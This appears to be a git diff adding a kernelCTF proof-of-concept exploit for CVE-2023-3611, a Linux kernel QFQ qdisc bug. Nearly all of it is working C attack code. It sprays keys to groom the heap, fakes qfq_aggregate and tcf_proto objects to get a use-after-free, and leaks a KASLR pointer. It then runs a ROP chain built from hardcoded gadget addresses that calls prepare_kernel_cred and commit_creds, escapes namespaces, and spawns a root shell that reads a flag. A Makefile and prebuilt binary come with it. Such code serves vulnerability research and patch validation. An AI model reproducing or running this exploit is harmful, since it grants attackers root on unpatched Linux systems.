sizeof(u32); + + nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_QFQ_LMAX; + nested->nla_len = NLA_HDRLEN + sizeof(u32); + *(u32*)((void*)nested + NLA_HDRLEN) = lmax; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create helper class!"); + free(nlh); + return -1; + } + free(nlh); + + if (sub_qdisc_handle != 0) { + return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle); + } + + return 0; +} + + +// Worker to spray qdiscs and potentially trigger the vulnerabilty. +// Each worker will have its own network namespace and create qdiscs +// for the loopback device. +// We could create virtual devices, but here we are. +int bug_worker(void* arg) { + int i = *(int*)arg; + + const u32 handle = 0x10000000 | (i << 16); + const u32 handle_oob = handle | (1 << 0); + const u32 handle_help = handle | (1 << 1); + const u32 handle_faked1 = handle | (1 << 2); + + const u32 sub_handle_help = 0x20010000; + const u32 sub_handle_oob = 0x20020000; + + const int loindex = if_nametoindex("lo"); + + int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + FAIL_IF(s < 0); + + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + if (prepare_device(s, loindex) < 0) { + return -1; + } + + // Prepare qfq qdisc without anything else. + // Eventually we will create everything of interest when we pull the trigger. + // Until that this qdisc serves as some kind of "grooming" object + // Note that this qdisc is created with a specifically chosen TCA_STAB + // so that we can trigger the vulnerability. + if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle, 1) < 0) { + return -1; + } + + EVENT_SET(parent_notify); + + while (!done) { + while (wake != i) { + sleep(1); + } + wake = 0; + + L("worker %d is entering stage 1: trigger vulnerability", i); + + L("trying to prepare helper class .."); + // This is a real helper class: We use it to make the code below follow + // certain paths in sch_qfq.c + // We require the following: + // - qfq_sch->in_serv_agg != NULL + // - qfq_sch->in_serv_agg != OOB agg + // We use a netem qdisc with a large delay to consistently hit the window + // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset. + if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) { + E("failed to create helper class :("); + return -1; + } + + L("trying to prepare oob class .."); + // Class which will carry the aggregate with the OOB group + // In order to hit the desired update code paths, this class needs + // packets in its (sub)qdisc. Additionally we ideally want to drop the + // packet that causes the OOB group to be created. + // We use the same netem qdisc for this, additionally the netem qdisc will + // have a limit of 1 dropping all packets after the first one. + if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) { + E("failed to create oob class :("); + return -1; + } + + L("activating helper agg .."); + u8 buf[1 << 9] = {0}; + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // set in_serv_agg = helper agg + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // make (not-yet) oob class active + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + L("spraying some fake qfq_aggregate .."); + prep_agg_payload(&agg.agg, 0x10000000000001, 0x1337); + FAIL_IF(spray(SPRAY_128, ATTEMPT_SMALL_EVERY, &agg, sizeof(agg)) < 0); + + // trigger vulnerability + // note that this packet will be dropped by the child (netem) qdisc + FAIL_IF(sendto(sc, buf, 1 << 9, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + L("spraying some more fake qfq_aggregate .."); + FAIL_IF(spray(SPRAY_128, ATTEMPT_SMALL_EVERY, &agg, sizeof(agg)) < 0); + + close(ss); + close(sc); + + L("waking parent"); + EVENT_SET(parent_notify); + + while (wake != i) { + sleep(1); + } + wake = 0; + + // At this stage the vulnerability should have flipped a bit of qfq_sch->nonfull_aggs + // pointing to one of our fake aggregates sprayed above. + // We will now try to create a class using this fake aggregate. + // This will eventually allow us to reach a UaF scenario. + L("worker %d is entering stage 2: smuggle a fake aggregate", i); + + L(" trying to create class using the fake aggregate .."); + if (create_helper_class(s, loindex, handle_faked1, 0, 0x1337) != 0) { + return -1; + } + + L("waking parent"); + EVENT_SET(parent_notify); + + while (wake != i) { + sleep(1); + } + wake = 0; + + L("worker %d is entering stage 3: trigger UaF", i); + if (delete_class(s, loindex, handle_faked1) != 0) { + return -1; + } + + L("waking parent"); + EVENT_SET(parent_notify); + + while (!done) { + sleep(1); + } + } + + return 0; +} + +// Final stage worker which will spray tcf_proto payloads and hopefully trigger +// the one which gives us a shell +int final_stage_worker(void* arg) { + const int loindex = if_nametoindex("lo"); + const u32 handle = 0x30000000; + int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + FAIL_IF(s < 0); + + { + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0); + } + + FAIL_IF(prepare_device(s, loindex) < 0); + // We want any qdisc here to attach the filters to, just re-use some code + FAIL_IF(create_qfq_qisc(s, loindex, TC_H_ROOT, handle, 0) < 0); + + EVENT_SET(parent_notify); + + sleep(1); + EVENT_WAIT(final_worker_notify); + + // We freed the fake qfq_aggregate (for which we have a key handle id_agg) + // Try to reclaim it using tcf_proto s + // We use rsvp filters, see below. + L("spraying tcf_proto .."); + for (int i = 0; i < 80; i++) { + FAIL_IF(create_tcfilter(s, loindex, handle, 0x1000 + i) != 0); + } + + // So this is a bit sketchy. keyctl_read will not copy the buffer + // if the size does not match. This will force us to copy a HUGE + // amount of memory which hopefully does not fault :( + // This actually is a problem on the mitigation instance (presumably because + // of the CONFIG_SLAB_VIRTUAL). To circumvent this problem we choose + // a filter which has a very "low" address for its classify operation + // (tcf_proto->classify overlaps the length field of our key) + // "rsvp_classify" is the lowest I could find + FAIL_IF(read_key(id_agg, &agg, sizeof(agg)) < 0); + + leak_cls_rsvp_ops = (u64)agg.tp.ops; + L("leaked kaslr pointer (cls_rsvp_ops): %p", (void*)leak_cls_rsvp_ops); + + if ((leak_cls_rsvp_ops & 0xFFFF000000000000) != 0xFFFF000000000000) { + E("leak looks incorrect :("); + return -1; + } + + i64 diff = cls_rsvp_ops - leak_cls_rsvp_ops; + L("diff: %lld", diff); + + #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + + prep_tcf_proto_payload(&agg); + prep_final_large_payload(&large); + + struct key saved[] = { + { + .id = id_large, + .type = -1, + } + }; + FAIL_IF(spray_reset_except(saved, 1)); + + int spray_small = 1; + int spray_large = 1; +retry: + if (spray_small) { + struct key saved[] = { + { + .id = -1, + .type = SPRAY_8192, + } + }; + + // Free the tcf_proto and reclaim it with a fake one + FAIL_IF(spray_reset_except(saved, 1)); + FAIL_IF(spray(SPRAY_128, 50, &agg, sizeof(agg))); + spray_small = 0; + + sleep(1); + } + + if (spray_large) { + struct key saved[] = { + { + .id = -1, + .type = SPRAY_128, + } + }; + // Free the 8192 large key object and reclaim it with a prepared ROP payload + FAIL_IF(spray_reset_except(saved, 1)); + FAIL_IF(spray(SPRAY_8192, 2, &large, sizeof(large))); + spray_large = 0; + } + + // Final trigger .. + { + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_GETTFILTER; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = loindex; + data->tcm_parent = handle; + data->tcm_handle = 0; + + u16 protocol = 0xdead; + data->tcm_info = ((u32)0x2222 << 16) | (u32)protocol; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("exploit") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "exploit"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + int err = netlink_errno(s, nlh); + + // This sometimes shows EBUSY, but it still works? + // We just ignore the error, ... + if (err != -EBUSY && err != 0) { + E("failed to trigger payload .."); + + // We have a small side-channel leak here, which makes the last step + // relatively stable: + // If the spray of fake tcf_proto failed, we will not find a suitable + // filter with the requested priority, thus kernel will return -ENOENT + // If the spray of the large prepared stack failed, the name of kind + // will be all zeros, thus not matching the requested "exploit" kind, + // thus kernel will return -EINVAL + + if (err == -ENOENT) { + L("retrying small spray .."); + spray_small = 1; + goto retry; + } + if (err == -EINVAL) { + L("retrying large spray .."); + spray_large = 1; + goto retry; + } + E("failed :("); + free(nlh); + return -1; + } + + free(nlh); + } + + return 0; +} + +int main() { + // main orchestration routine. + // mainly manages workers and occasionally collects leak information + + FAIL_IF(_pin_to_cpu(0) != 0); + + scratch_buf = calloc(16, 0x1000); + FAIL_IF(scratch_buf == NULL); + + int worker_i = 1; + int ki; + const struct key* key; + prep_stage1_large_payload(&large); + for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY*3; worker_i++) { + int do_the_thing = (worker_i % ATTEMPT_LARGE_EVERY == 0); + + if (do_the_thing && DO_BEFORE > 0) { + FAIL_IF(spray(SPRAY_8192, DO_BEFORE, &large, sizeof(large)) != 0); + } + + FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0); + EVENT_WAIT(parent_notify); + + if (do_the_thing) { + FAIL_IF(spray(SPRAY_8192, 3 - DO_BEFORE, &large, sizeof(large)) != 0); + + wake = worker_i; + EVENT_WAIT(parent_notify); + + ki = 0; + while ((key = get_key(ki++)) != NULL) { + if (key->type != SPRAY_8192) { + continue; + } + + FAIL_IF(read_key(key->id, &large, sizeof(large)) < 0); + for (int k = 0; k < ARRAY_LEN(large.group.slots); k++) { + leak_agg_ptr = (u64)large.group.slots[k].first; + if (leak_agg_ptr != 0) { + if ((leak_agg_ptr & 0x80) != 0) { + // This is the bit we flipped. If it was already set, try again. + // At this point we should be relatively stable (TM) + + E("we succeeded, but the qfq_aggregate pointer had the wrong bit set: %p", (void*)leak_agg_ptr); + break; + } + + id_large = key->id; + goto stage2; + } + } + } + + E("attempt failed. trying again .."); + prep_stage1_large_payload(&large); + FAIL_IF(spray_reset()); + } + } + + goto failed; + +stage2: + L("leaked struct qfq_aggregate heap pointer: %p", (void*)leak_agg_ptr); + + wake = worker_i; + EVENT_WAIT(parent_notify); + + ki = 0; + while ((key = get_key(ki++)) != NULL) { + if (key->type != SPRAY_128) { + continue; + } + + FAIL_IF(read_key(key->id, &agg, sizeof(agg)) < 0); + + if (agg.agg.grp != NULL) { + leak_grp_ptr = (u64)agg.agg.grp; + id_agg = key->id; + break; + } + } + + if (leak_grp_ptr == 0) { + E("we failed to get the grp pointer?"); + goto failed; + } + + // offsetof(Qdisc, group assigned to agg) + 8192 because the overflowed page is right behind the qdisc. + leak_grp_ptr = (leak_grp_ptr - 5816) + 8192; + L("leaked key payload 8192 pointer: %p", (void*)leak_grp_ptr); + + // stage 3 + + // it seems we are not allowed to create a new netns here? + // just move it to a new child .. + FAIL_IF(spawn_worker(&final_stage_worker, NULL) < 0); + EVENT_WAIT(parent_notify); + + wake = worker_i; + + EVENT_WAIT(parent_notify); + EVENT_SET(final_worker_notify); + + while (1) { + sleep(100); + } + +failed: + E("we failed .("); + spray_exit(); + while (last_worker > 0) { + kill_worker(last_worker - 1); + } + return 0; +} + +/** + * Key payload spraying helper routines. + * + * Spraying is a little complicated because of the quota restrictions on sprayed keys and our multi process architecture. + * + * We will fork into a child process which will allocate all the keys. + * This process will own all the keys saving us the troubles of key permissions. + * The cost is additional complexity here. All the keyctl syscalls are essentially proxied through to the child process. +*/ + +inline static key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) { + return syscall(__NR_add_key, type, description, payload, plen, ringid); +} + +long __keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { + return syscall(__NR_keyctl, option, arg2, arg3, arg4, arg5); +} + +struct spray_info { + int num_keys; + struct key* keys; +}; + +enum { + CMD_spray_keys = 0, + CMD_reset_keys = 1, + CMD_keyctl = 2, + CMD_stop = 3, +}; + +struct shm { + int target; + union { + struct { + int type; + void* payload; + size_t plen; + int n; + } add_args; + struct { + int option; + unsigned long args[4]; + } keyctl_args; + struct { + const key_serial_t* except; + } reset_except_args; + } u; + int err; + + int event_begin; + int event_end; +}; + +struct helper { + void* stack; + int pid; +}; + +static struct spray_info info = { + .num_keys = 0, + .keys = NULL, +}; + +static struct helper helper = { + .stack = NULL, + .pid = 0, +}; + +static struct shm shm = { + .target = 0, + .err = 0, + .event_begin = __EVENT_UNSET, + .event_end = __EVENT_UNSET, +}; + +static int spray_buffers(int type, void* payload, size_t plen, int n) { + char desc[32] = {0}; + info.keys = (struct key*)reallocarray(info.keys, n + info.num_keys, sizeof(struct key)); + if (info.keys == NULL) { + return -1; + } + + for (int i = 0; i < n; i++) { + int j = info.num_keys; + + snprintf(desc, sizeof(desc) - 1, "%d-%d", type, j); + + info.keys[j].type = type; + info.keys[j].id = add_key("user", desc, payload, plen, KEY_SPEC_PROCESS_KEYRING); + + if (info.keys[j].id == -1) { + return -1; + } + + info.num_keys ++; + } + + return 0; +} + +static int spray_worker(void* unused) { + int ret; + + while (1) { + EVENT_WAIT(shm.event_begin); + + shm.err = -1; + switch (shm.target) { + case CMD_spray_keys: { + int type = shm.u.add_args.type; + void* payload = shm.u.add_args.payload; + size_t plen = shm.u.add_args.plen; + int n = shm.u.add_args.n; + + shm.err = spray_buffers(type, payload, plen, n); + break; + } + case CMD_reset_keys: + shm.err = 0; + while (info.num_keys > 0) { + int i = info.num_keys - 1; + + if (info.keys[i].id >= 0) { + if (__keyctl(KEYCTL_REVOKE, info.keys[i].id, 0, 0, 0) < 0) { + shm.err = -1; + break; + } + } + + info.num_keys --; + } + break; + case CMD_keyctl: + shm.err = __keyctl(shm.u.keyctl_args.option, + shm.u.keyctl_args.args[0], + shm.u.keyctl_args.args[1], + shm.u.keyctl_args.args[2], + shm.u.keyctl_args.args[3]); + break; + case CMD_stop: + goto exit; + default: + break; + } + + EVENT_SET(shm.event_end); + } + +exit: + EVENT_SET(shm.event_end); + return 0; +} + +static int ensure_helper() { + if (helper.pid <= 0) { + if (helper.stack == NULL) { + void* stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(stack == MAP_FAILED); + helper.stack = stack; + } + + helper.pid = clone(&spray_worker, (char*)helper.stack + 0x4000, CLONE_VM, NULL); + FAIL_IF(helper.pid < 0); + } + + return 0; +} + +int spray(int type, int n, void* payload, size_t plen) { + shm.u.add_args.type = type; + shm.u.add_args.payload = payload; + shm.u.add_args.plen = plen; + shm.u.add_args.n = n; + + FAIL_IF(ensure_helper() != 0); + + shm.target = CMD_spray_keys; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + return shm.err; +} + +int spray_reset() { + FAIL_IF(ensure_helper() != 0); + + shm.target = CMD_reset_keys; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + return shm.err; +} + +int spray_reset_except(struct key *ids, size_t num_ids) { + FAIL_IF(ensure_helper() != 0); + + struct key* tmp = calloc(info.num_keys, sizeof(struct key)); + FAIL_IF(tmp == NULL); + + int num_saved = 0; + for (int i = 0; i < info.num_keys; i++) { + for (int j = 0; j < num_ids; j++) { + if (info.keys[i].id == ids[j].id || info.keys[i].type == ids[j].type) { + tmp[num_saved] = info.keys[i]; + num_saved++; + + info.keys[i] = info.keys[info.num_keys - 1]; + info.num_keys--; + i--; + break; + } + } + } + + shm.target = CMD_reset_keys; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + free(info.keys); + info.keys = tmp; + info.num_keys = num_saved; + + return shm.err; +} + +int spray_exit() { + FAIL_IF(ensure_helper() != 0); + + shm.target = CMD_stop; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + sleep(1); + munmap(helper.stack, 0x4000); + helper.pid = -1; + + return shm.err; +} + +const struct key* get_key(unsigned index) { + if (index >= info.num_keys) { + return NULL; + } + + return &info.keys[index]; +} + + +long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { + FAIL_IF(ensure_helper() != 0); + + shm.u.keyctl_args.option = option; + shm.u.keyctl_args.args[0] = arg2; + shm.u.keyctl_args.args[1] = arg3; + shm.u.keyctl_args.args[2] = arg4; + shm.u.keyctl_args.args[3] = arg5; + + shm.target = CMD_keyctl; + EVENT_SET(shm.event_begin); + EVENT_WAIT(shm.event_end); + + return shm.err; +} diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/Makefile new file mode 100644 index 00000000..a590ce1c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/Makefile @@ -0,0 +1,11 @@ +all: exploit.c bin + $(CC) exploit.c -o bin/exploit -O3 -static + +exploit: exploit.c + $(CC) exploit.c -o exploit -O3 -static + +bin: + mkdir -p bin/ + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit new file mode 100755 index 00000000..f7b4998c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit.c new file mode 100644 index 00000000..9526fea5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit.c @@ -0,0 +1,1102 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; + +_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1"); +_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2"); +_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4"); +_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8"); +_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1"); +_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2"); +_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4"); +_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8"); + +#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__) +#define E(fmt, ...) printf("ERROR: " fmt "\n", ##__VA_ARGS__) + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} + +#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x +#define pad8(x) pad4(x), pad4(x) + +#define p64(x) (u8)(((x) >> 0) & 0xFF), \ + (u8)(((u64)(x) >> 8) & 0xFF), \ + (u8)(((u64)(x) >> 16) & 0xFF), \ + (u8)(((u64)(x) >> 24) & 0xFF), \ + (u8)(((u64)(x) >> 32) & 0xFF), \ + (u8)(((u64)(x) >> 40) & 0xFF), \ + (u8)(((u64)(x) >> 48) & 0xFF), \ + (u8)(((u64)(x) >> 56) & 0xFF) + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define PACK __attribute__((__packed__)) + +#define __EVENT_SET 0 +#define __EVENT_UNSET 1 + +#define EVENT_DEFINE(name, init) volatile int name = init +#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); } + +#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE) +#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE) + +// GADGETS { +u64 find_task_by_vpid = 0xffffffff8110a0d0; +u64 switch_task_namespaces = 0xffffffff81111c80; +u64 commit_creds = 0xffffffff811136f0; +u64 prepare_kernel_cred = 0xffffffff811139d0; +u64 init_task = 0xffffffff836159c0; +u64 init_nsproxy = 0xffffffff83661680; +u64 oops_in_progress = 0xffffffff8419f478; +u64 mov_rdi_rax = 0xffffffff81041293; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp 0xffffffff82404440 {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3 +u64 pop_rcx_ret = 0xffffffff8102898c; // pop rcx; ret // 59c3 +u64 pop_rsi = 0xffffffff8101806c; // pop rsi; jmp 0xffffffff82404440 {taken}; ret // 5ee9ce1e4001c3 +u64 pop_rdi = 0xffffffff8102764d; // pop rdi; jmp 0xffffffff82404440 {taken}; ret // 5fe97e094001c3 +u64 push_rsi_jmp_rsi_0x39 = 0xffffffff818ca79b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639 + +u64 pop_rsp = 0xffffffff8100143b; // pop rsp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 5ce9ff2f4001c3 +u64 add_rsp_0x88 = 0xffffffff8103d43d; // add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 4881c488000000e9f76f3c01c3 + +u64 enter_pop_rbx_pop_rbp_pop_r12 = 0xffffffff81b14680; // enter 0, 0; pop rbx; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // c80000005b5d415ce9b3fd8e00c3 +// -> rbx = rbp, pop rbp, pop r12 +u64 mov_rbp_rbx_pop_rbx_pop_rbp = 0xffffffff8107ff46; // mov [rbp], rbx; pop rbx; pop rbp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 48895d005b5de9ef443801c3 +u64 push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12 = 0xffffffff81be0fed; // push qword ptr [rcx+rsi+0x5b]; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // ff74315b5d415ce947348200c3 + +// trailer of qfq_enqueue +// 0xffffffff81cd460f <+591>: lea -0x28(%rbp),%rsp +// 0xffffffff81cd4613 <+595>: mov %ecx,%eax +// 0xffffffff81cd4615 <+597>: pop %rbx +// 0xffffffff81cd4616 <+598>: pop %r12 +// 0xffffffff81cd4618 <+600>: pop %r13 +// 0xffffffff81cd461a <+602>: pop %r14 +// 0xffffffff81cd461c <+604>: pop %r15 +// 0xffffffff81cd461e <+606>: pop %rbp +// 0xffffffff81cd461f <+607>: jmp 0xffffffff82404440 <__x86_return_thunk> +u64 leave = 0xffffffff81cd460f; + +u64 add_rcx_edi = 0xffffffff81063063; // add [rcx], edi; ret // 0139c3 + +// } GADGETS + +#define FOR_ALL_OFFSETS(x) do { \ + x(find_task_by_vpid); \ + x(switch_task_namespaces); \ + x(commit_creds); \ + x(prepare_kernel_cred); \ + x(init_task); \ + x(init_nsproxy); \ + x(oops_in_progress); \ + x(mov_rdi_rax); \ + x(pop_rcx_ret); \ + x(pop_rsi); \ + x(pop_rdi); \ + x(push_rsi_jmp_rsi_0x39); \ + x(pop_rsp); \ + x(add_rsp_0x88); \ + x(enter_pop_rbx_pop_rbp_pop_r12); \ + x(mov_rbp_rbx_pop_rbx_pop_rbp); \ + x(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12); \ + x(leave); \ + x(add_rcx_edi); \ + } while(0) + +// Reverse calculation of the index in sch_qfq.c:qfq_calc_index +// Our desired index will be 27 so that the fake group resides at offset 288 into +// our large spray object. +#define _TARGET_INDEX 27 +#define _MIN_SLOT_SHIFT 25 +#define _NUM_CLS 1 +#define _CLS_WEIGHT 1 +#define _ONE_FP 0x40000000 +#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1 + 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS) + +#define SIZEOF_QDISC_SIZE_TABLE 60 + +struct list_head { + struct list_head * next; /* 0 8 */ + struct list_head * prev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + + +struct hlist_head { + struct hlist_node * first; /* 0 8 */ + + /* size: 8, cachelines: 1, members: 1 */ + /* last cacheline: 8 bytes */ +}; + +struct hlist_node { + struct hlist_node * next; /* 0 8 */ + struct hlist_node * * pprev; /* 8 8 */ + + /* size: 16, cachelines: 1, members: 2 */ + /* last cacheline: 16 bytes */ +}; + +struct tcf_proto { + void* next; /* 0 8 */ + void * root; /* 8 8 */ + int (*classify)(void*, const struct tcf_proto *, void*); /* 16 8 */ + u16 protocol; /* 24 2 */ + + /* XXX 2 bytes hole, try to pack */ + u8 __pad0[2]; + + u32 prio; /* 28 4 */ + void * data; /* 32 8 */ + const void * ops; /* 40 8 */ + void * chain; /* 48 8 */ + u32 lock; /* 56 4 */ + u8 deleting; /* 60 1 */ + + /* XXX 3 bytes hole, try to pack */ + u8 __pad1[3]; + + /* --- cacheline 1 boundary (64 bytes) --- */ + u32 refcnt; /* 64 4 */ + + /* XXX 4 bytes hole, try to pack */ + u8 __pad2[4]; + + u8 rcu[16]; + struct hlist_node destroy_ht_node; /* 88 16 */ + + /* size: 104, cachelines: 2, members: 13 */ + /* sum members: 95, holes: 3, sum holes: 9 */ + /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; +_Static_assert(sizeof(struct tcf_proto) == 104); + +struct qfq_group { + u64 S; /* 0 8 */ + u64 F; /* 8 8 */ + unsigned int slot_shift; /* 16 4 */ + unsigned int index; /* 20 4 */ + unsigned int front; /* 24 4 */ + + u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */ + + long unsigned int full_slots; /* 32 8 */ + struct hlist_head slots[32]; /* 40 256 */ + + /* size: 296, cachelines: 5, members: 7 */ + /* sum members: 292, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +} PACK; + +struct stab_payload { + union { + u8 __pad1[288 - SIZEOF_QDISC_SIZE_TABLE]; + u16 sizetable[2]; + }; + struct qfq_group group; + u8 __pad2[4098 - sizeof(struct qfq_group) - 288 - 4]; + u32 id; +} PACK; +_Static_assert(sizeof(struct stab_payload) > 4096 - SIZEOF_QDISC_SIZE_TABLE); + +// Our fake tcf_proto we will place into qfq_sched->filter_list +struct tcf_proto_payload { + union { + struct tcf_proto org; + u64 stack[100]; + }; +} PACK; + +static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +static u64 leak_kernel_base = 0; + +static void* payload = NULL; +static struct stab_payload fake_group = {0}; + +int get_kernel_base(); + +#ifndef ATTEMPT_LARGE_EVERY +#define ATTEMPT_LARGE_EVERY 17 +#endif + +void maybe_win() { + int fd = open("/proc/1/ns/mnt", O_RDONLY); + if (fd < 0) { + return; + } + + L("SUCCESS."); + setns(fd, 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + L("spawning shell .."); + char* argv[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && /bin/sh", + NULL, + }; + execve(argv[0], argv, NULL); + exit(1); +} + + +void prep_tcf_proto_payload(struct tcf_proto_payload* p) { + memset(p, 0, sizeof(*p)); + + // store framepointer at a sane address. + const u64 framepp = oops_in_progress; + + u8 rop[] = { + [0] = p64(add_rsp_0x88), + + [0x39] = p64(pop_rsp), + + [8 + 0x88] = p64(enter_pop_rbx_pop_rbp_pop_r12), + p64(framepp), + p64(0xdead000000000001), // scratch r12 + p64(mov_rbp_rbx_pop_rbx_pop_rbp), + p64(0xdead000000000002), // scratch rbx + p64(0xdead000000000003), // scratch rbp + p64(add_rsp_0x88), + + [8 + 0x88 + 8 * 7 + 0x88] = p64(add_rsp_0x88), + + [8 + 0x88 + 8 * 7 + 0x88 + 8 + 0x88] = p64(pop_rdi), + p64(init_task), + p64(prepare_kernel_cred), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(commit_creds), + + p64(pop_rdi), + p64(1), + 